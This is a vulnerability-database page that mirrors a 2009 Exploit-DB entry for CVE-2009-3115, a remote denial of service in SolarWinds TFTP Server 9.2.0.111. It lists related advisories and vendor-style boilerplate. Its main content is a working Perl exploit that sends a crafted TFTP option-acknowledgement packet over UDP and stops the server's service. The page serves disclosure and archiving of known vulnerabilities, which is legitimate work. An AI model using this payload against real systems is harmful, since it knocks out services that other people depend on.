Lucene search
+L

SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service

🗓️ 31 Aug 2009 00:00:00Reported by Gaurav BaruahType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

SolarWinds TFTP Server 9.2.0.111 Remote Denial of Service exploit denial of service by sending crafted payload stops TFTP Servic

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3115
31 Aug 200900:00
circl
cve
CVE
CVE-2009-3115
9 Sep 200922:00
cve
cvelist
Cvelist
CVE-2009-3115
9 Sep 200922:00
cvelist
euvd
EUVD
EUVD-2009-3098
7 Oct 202500:30
euvd
kaspersky
Kaspersky
KLA10333 DoS vulnerability in TFTP
9 Sep 200900:00
kaspersky
nvd
NVD
CVE-2009-3115
9 Sep 200922:30
nvd
openvas
OpenVAS
SolarWinds TFTP Server 9.2.0.111 Option Acknowledgement Request DoS Vulnerability - Active Check
31 Aug 200900:00
openvas
prion
Prion
Design/Logic Flaw
9 Sep 200922:30
prion
#!/usr/bin/perl
# SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit
# by Gaurav Baruah
# TFTP Server Service stops after payload
# is sent, and has to be started again in Config
# Tested on XP SP3
# Big thnx: dragunov
# Greetz: Sanjay

use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$boom=
"\x00\x06\x54\x9d\x68\x21\xde\x59\x30\x9a\x0b\xb5\xd4\x94\x94\x42\x3c\xeb\xc5".
"\xc1\xe8\x7d\x31\x34\xee\xd8\x60\x41\x8f\x92\x25\x9c\x5c\xcc\x78\x6a";
$tftpudp->send($boom);

# milw0rm.com [2009-08-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.10658
27